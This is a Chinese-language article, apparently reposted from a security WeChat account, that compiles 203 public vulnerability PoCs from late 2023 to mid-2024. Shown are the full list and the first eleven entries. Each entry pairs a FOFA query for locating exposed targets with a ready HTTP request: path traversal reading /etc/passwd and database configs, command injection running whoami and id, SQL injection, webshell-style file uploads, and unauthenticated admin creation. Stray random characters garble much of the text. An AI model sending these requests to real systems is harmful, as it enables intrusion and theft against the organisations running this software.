互联网公开漏洞整理202309-202406
/ k9 q9 c" Z8 n/ t道一安全 2024-06-05 07:41 北京5 a4 t! ~6 O6 v/ ^5 P' o
以下文章来源于网络安全新视界 ,作者网络安全新视界 y8 x2 R- E2 f) W) J
- T' e B; V. t" c发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。) [5 @9 _( w2 t! |0 {2 c
5 w& f; _9 X( P; ~+ i3 Z8 D& Z
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
+ u& B7 N1 ]9 g$ ~- T8 z
2 \7 b0 l) T/ M6 t; ^+ O# L安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
5 J, r# Y/ |% _9 y+ l# G t3 h; k5 W$ @, X3 i. s8 k$ @
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。, ^, f. I5 W" _0 F
1 G' t# |5 W, t0 Z$ o9 Y合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
$ O3 ~; |# U3 N
) L) c) I4 O0 g- F3 a" W
8 D. y- W8 p0 u$ R! f5 w声明
3 q6 h% m& E. q5 A# ^0 \/ _
( [5 h! t1 g k' R$ p% U为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
, ~9 Y: H8 a% w; K+ r4 Z7 _) ]% h7 d) L+ M, a
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。9 l) q2 O8 @" K$ i6 u* a
) p7 c1 H2 W2 B3 y9 i4 o) a2 g4 S* X* ~" ^) E
7 {( p$ u2 E6 n) ~) E
目录# s9 d+ M6 b$ ]4 r0 t# k
3 N3 ?# b. |! p% o k0 J; |1 U018 v/ N2 [3 _* I# [3 n
7 C% C C' ~- \6 c8 @1. StarRocks MPP数据库未授权访问7 I: G9 N" J7 E& v0 x) w5 U
2. Casdoor系统static任意文件读取
4 T( n- J' G7 M; {) [: f1 m3. EasyCVR智能边缘网关 userlist 信息泄漏2 A% U4 S: x0 p: E2 ~! }
4. EasyCVR视频管理平台存在任意用户添加# @6 X, V; g& J* E
5. NUUO NVR 视频存储管理设备远程命令执行 D! y7 a% [" ]4 l7 k
6. 深信服 NGAF 任意文件读取+ ]8 [. {: ~- F' x5 J
7. 鸿运主动安全监控云平台任意文件下载8 H% w! v6 t# K& c# ?
8. 斐讯 Phicomm 路由器RCE
* w! D: s H8 h" K; f9. 稻壳CMS keyword 未授权SQL注入
# Q/ q4 l- q. ~10. 蓝凌EIS智慧协同平台api.aspx任意文件上传7 X4 R7 q) ~& o# {3 G' z( E2 E- [: G
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
* s. j# B7 Q& O9 ^% u7 e* k12. Jorani < 1.0.2 远程命令执行1 m" h4 B7 M% r. f5 _
13. 红帆iOffice ioFileDown任意文件读取
- H% R1 x& R: U. E/ r' u$ y- p14. 华夏ERP(jshERP)敏感信息泄露
8 N: [9 U7 B# ^15. 华夏ERP getAllList信息泄露3 Q! M- u1 a6 ^+ B: D8 r; ?' r) @
16. 红帆HFOffice医微云SQL注入
+ a2 ]8 E1 _) D, M9 ]17. 大华 DSS itcBulletin SQL 注入) X' I3 W# [; p. h
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露2 @$ I2 [; W3 R$ v# W$ ?- s7 |
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入0 o) e8 }3 }; B- X2 g$ z
20. 大华ICC智能物联综合管理平台任意文件读取* g1 u% D/ J7 u7 a7 X
21. 大华ICC智能物联综合管理平台random远程代码执行/ m6 ^. {" c1 H* L! ?! g
22. 大华ICC智能物联综合管理平台 log4j远程代码执行3 J9 Q. B+ E9 @
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行4 {: B, E; ^- i6 ]* d B! T% G
24. 用友NC 6.5 accept.jsp任意文件上传
$ d6 k+ |7 }2 ~$ S25. 用友NC registerServlet JNDI 远程代码执行
- n2 P# c1 R6 x+ E26. 用友NC linkVoucher SQL注入/ ~- U; k8 Y+ Z
27. 用友 NC showcontent SQL注入
8 `3 L, O1 |+ U* Q0 }28. 用友NC grouptemplet 任意文件上传3 e% h) z9 U6 J) F- W; s/ W1 g
29. 用友NC down/bill SQL注入" Y1 N$ R! ] Q- _2 Z
30. 用友NC importPml SQL注入
4 w; Z# a+ R- R& w+ C* D4 Q31. 用友NC runStateServlet SQL注入
$ ? ~0 M% Q' }+ t) T/ J32. 用友NC complainbilldetail SQL注入& F( J# R$ @8 s
33. 用友NC downTax/download SQL注入4 e* s+ H# w3 m2 j) I
34. 用友NC warningDetailInfo接口SQL注入+ H) K( d0 s4 `
35. 用友NC-Cloud importhttpscer任意文件上传
4 d" W0 w+ l* |0 ~, q3 @36. 用友NC-Cloud soapFormat XXE
+ P0 v# w- l, v0 F3 R! m* Y37. 用友NC-Cloud IUpdateService XXE! T9 N8 z" q8 i! K2 L
38. 用友U8 Cloud smartweb2.RPC.d XXE# F% ^9 M) [& l) t5 B
39. 用友U8 Cloud RegisterServlet SQL注入) I( c$ X; R" z& ~! i5 j1 @: t
40. 用友U8-Cloud XChangeServlet XXE
0 G7 [: `+ K9 R4 _41. 用友U8 Cloud MeasureQueryByToolAction SQL注入$ J: s7 {& s5 Q& q3 ]' F+ ^
42. 用友GRP-U8 SmartUpload01 文件上传# U% k/ n* A @* i) s4 U/ j
43. 用友GRP-U8 userInfoWeb SQL注入致RCE: U! ?4 a) C4 M$ i! W
44. 用友GRP-U8 bx_dj_check.jsp SQL注入5 R# S' O" F" ^1 p
45. 用友GRP-U8 ufgovbank XXE
0 j% u* T- \0 K# x7 F, ?, Z46. 用友GRP-U8 sqcxIndex.jsp SQL注入
- J) E( D" E, Q4 @9 Z0 e47. 用友GRP A++Cloud 政府财务云 任意文件读取$ d4 _# x4 W( q8 y& D/ M) T+ A/ G6 j
48. 用友U8 CRM swfupload 任意文件上传
7 P( @+ e" C( U2 |; h; a49. 用友U8 CRM系统uploadfile.php接口任意文件上传
3 W1 M+ f2 a" | l4 m% E) X4 S50. QDocs Smart School 6.4.1 filterRecords SQL注入/ d A$ T: p8 R8 _( `
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入! I$ J6 M9 I9 U+ V
52. 泛微E-Office json_common.php sql注入
. b, R0 {: c+ v9 [8 a- J3 k; x, K53. 迪普 DPTech VPN Service 任意文件上传" H+ |4 I: @2 F0 d C# e2 t
54. 畅捷通T+ getstorewarehousebystore 远程代码执行# o7 F/ o' p$ _* n% B
55. 畅捷通T+ getdecallusers信息泄露
. U/ V3 ?3 j4 y0 Z% b56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE5 k9 X4 F. z4 w1 F' Q3 i9 Q( _/ G
57. 畅捷通T+ keyEdit.aspx SQL注入
* U' {0 n9 i+ \2 B58. 畅捷通T+ KeyInfoList.aspx sql注入
+ ^" T6 ^- T# Q0 n3 m59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
, I8 P N4 K! T6 s% B3 W9 _/ [60. 百卓Smart管理平台 importexport.php SQL注入
6 X: K! s. f) l3 d; n: E61. 浙大恩特客户资源管理系统 fileupload 任意文件上传% K9 q& G* m# X4 w, G
62. IP-guard WebServer 远程命令执行
: V; g/ ]4 {+ W63. IP-guard WebServer任意文件读取0 k+ P+ X n+ ]( X/ ?' e! z
64. 捷诚管理信息系统CWSFinanceCommon SQL注入& L" f4 n% |' s6 g
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过1 [, m4 B0 S W
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入4 K" o/ ]" M% q& C- J j4 S0 e5 `+ f
67. 万户ezOFFICE wpsservlet任意文件上传3 `3 Y2 t6 G1 @# X2 H: N, A7 b" C
68. 万户ezOFFICE wf_printnum.jsp SQL注入( {+ \1 u, ~5 t5 T# {. s. R9 k
69. 万户 ezOFFICE contract_gd.jsp SQL注入! {) @7 g, U! d5 K3 {, D
70. 万户ezEIP success 命令执行" v" X% D8 u, ~+ D! |# I- Y
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入, |& j C) s8 U- S1 }+ [. B
72. 致远OA getAjaxDataServlet XXE0 }2 ]7 A3 Z$ n2 Q6 _
73. GeoServer wms远程代码执行6 m5 T+ y+ W* u# U6 H0 W- L4 L: f
74. 致远M3-server 6_1sp1 反序列化RCE
7 r* ]% s$ d0 r75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
; U' @1 Q; a8 [4 Q& O0 f76. 新开普掌上校园服务管理平台service.action远程命令执行: l+ @ S5 `9 Q) }) D
77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 r; b" W; L! S: T" p6 W& D" ^; d
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传4 n, \ K) `# C0 b! l, b n0 U+ g
79. BYTEVALUE 百为流控路由器远程命令执行
' |' u2 W# m9 p+ h80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
5 i4 a% R b, p( e; l$ P% z81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露( V- N& w- Q/ {, m9 F
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行 j L0 w l1 i$ o
83. JeecgBoot testConnection 远程命令执行
- r m! {4 j; \1 L84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
6 h/ s; f( s6 Q" {# y85. SysAid On-premise< 23.3.36远程代码执行
+ V+ E; a; ~+ _( [, V+ @86. 日本tosei自助洗衣机RCE. k1 p5 {3 w- ~) S& E, q9 B; A
87. 安恒明御安全网关aaa_local_web_preview文件上传
+ O R, w2 x+ x. K2 b88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
$ x, q8 Y& b n2 }89. 致远互联FE协作办公平台editflow_manager存在sql注入
% `& }' ?8 @+ k1 Y* K, Q90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
9 b7 M% }% x, K g$ A( o3 N; @! T91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
1 a* `. R, w' m92. 海康威视运行管理中心session命令执行7 P0 G% }2 z R. k! K: {
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
# E8 ?3 U8 [* i( Z. M94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传% \* L& l1 X! `. W3 @; [: k8 M
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
& B D# B a. X6 g2 P96. Apache OFBiz 18.12.11 groovy 远程代码执行
/ P5 P$ b% `7 I7 V m7 O97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行; R! Z) |7 z' T4 j4 ^
98. SpiderFlow爬虫平台远程命令执行
5 [5 ^3 }4 \6 Q! y. |/ ?! T* B- M99. Ncast盈可视高清智能录播系统busiFacade RCE
) ]8 U, A: s |" D100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
+ c/ v: }! ~0 d& W Y101. ivanti policy secure-22.6命令注入7 \6 j5 i; k& y/ m7 r
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
) u; m) q. U& k* y, q103. Ivanti Pulse Connect Secure VPN XXE
3 S9 l7 ?, b, j; K+ j6 h b5 e104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
; o& }/ z6 u$ L! S( R! R9 J4 @105. SpringBlade v3.2.0 export-user SQL 注入' F* Y( D; W! ?1 E4 O
106. SpringBlade dict-biz/list SQL 注入
$ o0 f2 Y7 s3 x6 @$ i107. SpringBlade tenant/list SQL 注入
( i2 e1 [2 ~* Z4 H# D, d7 T108. D-Tale 3.9.0 SSRF+ K2 O5 m' A7 d0 ?0 U2 A7 u
109. Jenkins CLI 任意文件读取* r( ^% d$ H5 w0 s7 O3 t$ g
110. Goanywhere MFT 未授权创建管理员
' f, g( a' d1 R" L, \& O7 }, n111. WordPress Plugin HTML5 Video Player SQL注入
1 I8 R+ P9 B/ }1 E9 m1 q112. WordPress Plugin NotificationX SQL 注入
0 q' W- d* \5 ^4 J' Y$ F113. WordPress Automatic 插件任意文件下载和SSRF
+ m3 d g$ y. M& f% n h114. WordPress MasterStudy LMS插件 SQL注入+ y2 R' a. R' D- z$ t
115. WordPress Bricks Builder <= 1.9.6 RCE
' d$ |- h+ e2 X/ H6 s% m9 a q# r116. wordpress js-support-ticket文件上传
- ~7 @2 F) x* V117. WordPress LayerSlider插件SQL注入
}4 j5 P4 J) ?7 i" ]5 f$ i118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
# S- Y* M$ n: H/ u7 z1 \119. 北京百绰智能S20后台sysmanageajax.php sql注入& J: H: n+ A, E
120. 北京百绰智能S40管理平台导入web.php任意文件上传
; W% G6 J- e" l0 ~+ G, G121. 北京百绰智能S42管理平台userattestation.php任意文件上传, f+ P0 M: z! J
122. 北京百绰智能s200管理平台/importexport.php sql注入2 H, { \ H* g5 n
123. Atlassian Confluence 模板注入代码执行 r6 M7 N: b& T$ ~% p
124. 湖南建研工程质量检测系统任意文件上传' f4 d8 o/ {* c" U: S, Q
125. ConnectWise ScreenConnect身份验证绕过9 ?& `! |& m. L; O( f/ C
126. Aiohttp 路径遍历5 }8 W" r* H* _5 S& M5 k
127. 广联达Linkworks DataExchange.ashx XXE
; E' E3 d3 j7 G128. Adobe ColdFusion 反序列化8 p4 O1 g( Q8 E5 Z1 H0 L' V U
129. Adobe ColdFusion 任意文件读取) V% e/ u. N; s5 c$ b& d
130. Laykefu客服系统任意文件上传
7 x: L2 A5 A) N0 x- l0 H1 n- S131. Mini-Tmall <=20231017 SQL注入
3 K6 z6 z3 z( ]& o132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; J, D* T$ [( d% u
133. H5 云商城 file.php 文件上传$ t' V* F ]9 W7 |3 `
134. 网康NS-ASG应用安全网关index.php sql注入1 | z, U7 S+ e; B) D
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入4 p2 d C0 {! ^7 u! W4 x
136. NextChat cors SSRF3 E. i( M2 @' O( X
137. 福建科立迅通信指挥调度平台down_file.php sql注入
& c* g! o' m/ }, x138. 福建科立讯通信指挥调度平台pwd_update.php sql注入7 X+ _8 X2 o' n1 {
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ ?. x) |& B" D* T5 c( o
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
, i" G+ a" _, k* {6 v3 z3 |& l141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入( p. W4 U/ B8 E. p
142. CMSV6车辆监控平台系统中存在弱密码
$ N) T5 E" L0 D, G r+ I143. Netis WF2780 v2.1.40144 远程命令执行
# @0 ]6 s" i$ D1 r0 T. b2 z144. D-Link nas_sharing.cgi 命令注入
, d( p/ }5 y4 P+ `( Q145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
" w- n3 N" z6 I2 {; j1 _* u9 ]$ U146. MajorDoMo thumb.php 未授权远程代码执行/ M+ `5 p5 y3 r7 v( Z
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
4 J8 h+ Q+ K- `6 X- y148. CrushFTP 认证绕过模板注入, @+ N4 }& [& b) c H; }9 J
149. AJ-Report开源数据大屏存在远程命令执行, j5 x# a$ w' ~) A! S" j; C- m5 F0 v) R, @
150. AJ-Report 1.4.0 认证绕过与远程代码执行
1 ~$ h/ V) x$ Y* Q5 M% g/ n( M151. AJ-Report 1.4.1 pageList sql注入
& p' `% |) z7 h5 D152. Progress Kemp LoadMaster 远程命令执行; G8 ^# } V- ]+ h
153. gradio任意文件读取5 p# E& Y6 i/ p( G7 q9 @. E
154. 天维尔消防救援作战调度平台 SQL注入5 | D) ^1 p, R0 J; ?7 z
155. 六零导航页 file.php 任意文件上传
4 O r# p1 T9 R: k156. TBK DVR-4104/DVR-4216 操作系统命令注入 x4 F; U& d' i/ t4 u9 ]
157. 美特CRM upload.jsp 任意文件上传
$ @, X( x. h2 U1 L1 E" G) d7 W158. Mura-CMS-processAsyncObject存在SQL注入2 W- d) g9 A1 M7 S1 g) @$ K7 A
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传7 |$ s6 \' i; g1 o9 z! V
160. Sonatype Nexus Repository 3目录遍历与文件读取/ Y2 @) m x+ O6 `; q
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传4 p7 R3 M) P' Z
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
r3 Y3 q, o0 y+ j+ f7 o163. 号卡极团分销管理系统 ue_serve.php 任意文件上传; k( ~ ]; e0 y) p
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
/ E5 \9 `8 _- b: R- E* O, P165. OrangeHRM 3.3.3 SQL 注入
# ^' @! S9 O" m7 D& ]* y8 u166. 中成科信票务管理平台SeatMapHandler SQL注入& G# ?! m7 s; {8 N
167. 精益价值管理系统 DownLoad.aspx任意文件读取
5 v/ e1 s8 d+ ?. w6 q E. s) g8 e168. 宏景EHR OutputCode 任意文件读取% w) U2 i) ]- A9 U
169. 宏景EHR downlawbase SQL注入
4 @* s. u+ P' F8 l2 {6 t# p170. 宏景EHR DisplayExcelCustomReport 任意文件读取) m9 v: |0 m2 n- w {
171. 通天星CMSV6车载定位监控平台 SQL注入
, |" x, a$ _+ Q. E: v8 g172. DT-高清车牌识别摄像机任意文件读取
) R0 [. M/ q* c173. Check Point 安全网关任意文件读取
2 @) d$ ]7 x) |: N }174. 金和OA C6 FileDownLoad.aspx 任意文件读取
% O, s3 w) u' C `2 f. Q175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入0 g. h, Z7 b6 \5 J* ~3 U
176. 电信网关配置管理系统 rewrite.php 文件上传- S l& u" S8 L! Z
177. H3C路由器敏感信息泄露
6 F h# T5 b- Q8 H& m4 Z+ L4 C+ {178. H3C校园网自助服务系统-flexfileupload-任意文件上传! J5 F) e- }2 |
179. 建文工程管理系统存在任意文件读取# _4 O/ u1 ^3 ~- e$ n8 n
180. 帮管客 CRM jiliyu SQL注入6 r' @) _# a" t/ s6 `: o0 c- Z. W% m
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
3 k& \; @$ U, ]) B- z. R182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
. G8 c+ i# a4 E- L- l1 R+ e2 X183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入# p# [/ m; `5 O% P! L) k
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
* J. R9 \# h5 X" v$ Z185. 瑞友天翼应用虚拟化系统SQL注入0 P& |) ] r: J7 m9 b
186. F-logic DataCube3 SQL注入
# R6 ]1 Y" ]1 X187. Mura CMS processAsyncObject SQL注入# }2 E0 N; {* e+ K2 ], Y
188. 叁体-佳会视频会议 attachment 任意文件读取5 E3 w& j! A4 k# ~2 v
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
$ f- M E9 z$ a2 ~190. 短视频矩阵营销系统 poihuoqu 任意文件读取
9 o. [. s/ {1 C3 y5 D, L191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
3 Z S; m, M: i. [% p* a9 d4 L! q192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
; `1 D" S, j% p5 e9 D7 X193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
+ h$ h0 z2 H2 S Z- U194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
+ H' w% A R; z. }195. 飞鱼星上网行为管理系统 send_order.cgi命令执行+ \5 i( u& z& w
196. 河南省风速科技统一认证平台密码重置7 Z! D; d8 W) Y- `
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入' w0 k ?. p7 U$ y
198. 阿里云盘 WebDAV 命令注入
* K6 k) H' w. O* Z199. cockpit系统assetsmanager_upload接口 文件上传
8 X! z( g3 V% G& M" `! T200. SeaCMS海洋影视管理系统dmku SQL注入
! E+ y2 _0 x8 }/ B: {6 {201. 方正全媒体新闻采编系统 binary SQL注入/ |$ j0 C2 g! q7 `9 T2 m. B+ a
202. 微擎系统 AccountEdit任意文件上传
) ?1 N/ h2 _* H" C' n203. 红海云EHR PtFjk 文件上传8 N5 F# |& ?4 v8 B
B, H( |( U8 L% d N& t/ f# y! z. N6 S
POC列表4 }1 K7 N! g- V% o+ m# t+ ]# a! C
1 a; q; d/ r" x" p7 d
02# z+ O7 d. P% X8 ]4 S+ k* S3 a: a
0 t. ]4 |- }- Z! S: s1. StarRocks MPP数据库未授权访问2 r. ^8 I6 U7 f8 l; f
FOFA :title="StarRocks". Q+ J/ Y2 Z9 E; h* b! `
GET /mem_tracker HTTP/1.12 `- w! G! w! I
Host: URL
% p4 u {, O+ @4 x4 L
5 C) Z4 W1 ?- T" l! B* y! e) a/ n8 q
2. Casdoor系统static任意文件读取/ n2 y: a! n8 f" A
FOFA :title="Casdoor"
* p0 J& T; i* OGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
3 }% Y9 J- k4 S* S1 F$ S/ }Host: xx.xx.xx.xx:9999
+ v, k8 T5 c9 S7 R6 PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; i4 ~! X: z' p( a' U& J( n
Connection: close
: |" e+ ?. R" e% r$ V# xAccept: */*- x% a K2 I0 H
Accept-Language: en/ C% q" R6 F6 M6 L; G9 N
Accept-Encoding: gzip* H3 z, S5 }0 [7 ^/ Y
" ~ h. [7 E- b$ ~
0 x/ Q6 `$ r: T. y
3. EasyCVR智能边缘网关 userlist 信息泄漏* _ E. D) ], v8 O2 W: N
FOFA :title="EasyCVR") d9 c9 R4 c" O! b7 {
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" q) t6 T0 f$ ]( k8 [
Host: xx.xx.xx.xx
' g4 x+ p! l3 y/ k4 }2 ] m" h" Z! n% |& v% [
- A- S8 A1 a2 ~3 x
4. EasyCVR视频管理平台存在任意用户添加. I" k& L4 n$ M# g$ W2 R6 F
FOFA :title="EasyCVR"
7 ^3 B9 l3 x, |0 ^) N/ {+ ^; \$ z: C' C. k% M! n6 \: b% @
password更改为自己的密码md51 N% @* b. F; A/ b. \
POST /api/v1/adduser HTTP/1.1+ s5 Q7 h, z5 T
Host: your-ip
6 ~# q: v, P: `4 d% e1 aContent-Type: application/x-www-form-urlencoded; charset=UTF-8
2 ] E7 V5 h" J$ q# F" {2 g# j0 p; B) ]
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=16 r7 c1 [1 ]& i1 q
/ Z5 H: a1 k+ X" X, Q& g9 `, P
4 \+ J% C# q# @5 e, y6 W
5. NUUO NVR 视频存储管理设备远程命令执行
0 c9 \: `) Q2 J; L7 BFOFA:title="Network Video Recorder Login"! ^, B3 L* _6 X9 X; [; s
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
' O' l3 _" q8 R' x9 o" oHost: xx.xx.xx.xx4 y \, T M% [: o& u( {$ U; I
" g# C# e6 c, A3 |6 j0 z4 [
6 O% _+ i2 g8 d! }6. 深信服 NGAF 任意文件读取" X& r5 Y4 P, Z2 b: E$ P! T
FOFA:title="SANGFOR | NGAF"
" P4 Y7 S$ @! ?5 nGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
* s0 T7 ^# t/ O' oHost:, r+ l1 b5 @% q z* G" c B L
5 q+ {1 C$ k0 q6 U6 C
0 ]9 [4 }- {/ {- I4 x8 Z7. 鸿运主动安全监控云平台任意文件下载& m0 e3 J2 E! L, y
FOFA:body="./open/webApi.html"
% x; r( H2 d) Y! T: gGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1* K. n( M4 C h" e& o) k
Host:
8 r4 ^9 c2 M/ c% C- P% @
. i: L; g! @" i+ c: v( Z6 D( Y" N
8. 斐讯 Phicomm 路由器RCE/ ]; f" j0 ?/ \7 j3 ?: ^5 a
FOFA:icon_hash="-1344736688"( a: c3 d; F( [, E. \/ [
默认账号admin登录后台后,执行操作
; k$ y3 O* ]' L8 t) N9 ~# S* U$ t! UPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
2 ?3 q1 ^& K% O1 _/ I- J+ QHost: x.x.x.x, b- s5 z+ j! G- x) V
Cookie: sysauth=第一步登录获取的cookie
) k H, J( n2 m2 u# v9 @; r. jContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
) W! l. K; I3 N5 R1 j* c7 H pUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
) g$ L( f: o$ N1 D+ p @4 U7 m' n: _ D, g
------WebKitFormBoundaryxbgjoytz
& i- P, b+ \) ]( W; L, ZContent-Disposition: form-data; name="wifiRebootEnablestatus"
% g: c4 @0 s2 T( Z; S( D! p
* T: f+ m! u. t' O9 O9 M* v%s
& z; P. x6 J" E# p------WebKitFormBoundaryxbgjoytz
4 i1 \) w" f3 x" o1 DContent-Disposition: form-data; name="wifiRebootrange"
, l4 q9 Y1 ]) ~4 K" T+ O8 ?2 u; I/ i- Y% l( v5 [
12:00; id;/ `# c% n9 I3 N
------WebKitFormBoundaryxbgjoytz
5 c( C* ]* \% X) K, JContent-Disposition: form-data; name="wifiRebootendrange"
* o0 u/ H, I7 O) @8 U9 O" E
0 E( L8 w* P7 G$ V%s:
1 F* v; F; H. \! R; m% A! g------WebKitFormBoundaryxbgjoytz1 j! }( I3 T( i
Content-Disposition: form-data; name="cururl2"" x4 U4 { Z8 q' @
' e! {5 u' S w, o) R2 {0 M1 G. w% [9 X' y- @
------WebKitFormBoundaryxbgjoytz--# j1 l8 t3 c4 ^- {' I5 N
: p6 T1 x8 s% E1 F0 @( O4 w* r* ^/ U2 m" b" Y4 ]4 l/ h
9. 稻壳CMS keyword 未授权SQL注入
! w' X e9 u7 ?6 V% wFOFA:app="Doccms"
8 [! l' [# F, Z. q LGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
+ ?' S* R7 f! x& | h& hHost: x.x.x.x. _. o0 O4 T# A6 j" b
$ ?! Z2 O) a! a/ p* F/ T' m. C
payload为下列语句的二次Url编码* o) o! S$ c" R* |
9 F6 q+ z5 c$ H' j1 f: H& z
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#. U; t- w2 [* `" M+ {
. y5 q9 p4 }; X: ?
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
, O g2 {$ F9 ?6 M% e3 C8 g0 lFOFA:icon_hash="953405444"5 K2 m5 [* x x% ^' ?5 r5 |$ c9 b
0 v" O# ]% h1 s- K8 g) h文件上传后响应中包含上传文件的路径
6 I B& b/ a. t7 cPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
" a) c; _' E# [9 ZHost: x.x.x.x:xx
! s- y; h& V+ u* f1 G) N1 K, kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36, O7 e# f1 j+ C5 \* Y
Content-Length: 197
6 z/ k: `. n9 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% ]5 m* K" \" B4 M
Accept-Encoding: gzip, deflate; S' b8 m# T# ^5 U% k: {% `
Accept-Language: zh-CN,zh;q=0.9
1 K3 @$ |/ V4 N6 R0 {Connection: close7 |% P: F( U. R! \4 V$ u! j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
: D9 h5 u& d' Y1 m
' J* u$ I) B& T1 m) O------WebKitFormBoundaryxdgaqmqu3 W5 D, ~1 M3 M) \; Q$ u3 K
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
4 w" r$ v% B5 ]Content-Type: text/html
+ h+ X& {/ d3 Y) Q5 b, G3 c# v! {: L
1 ~6 ^3 t9 t6 W6 V% A- d& Cjmnqjfdsupxgfidopeixbgsxbf3 N: N4 w: k$ O$ i* ?# H |
------WebKitFormBoundaryxdgaqmqu--! |) f; B; j6 t5 v8 z
/ ` w/ V7 n, q+ J
" w" x5 S4 U% ?/ j11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入/ {( D. `4 i9 N1 v) T3 \9 k
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
2 a9 K/ i3 {2 g1 X% sGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
" x1 p! N- j- t" A& |, ~- LHost: 127.0.0.1
$ J% K. p8 F% |$ Y% g! t/ rPragma: no-cache* ^7 _) X) X$ z i2 X% r2 F
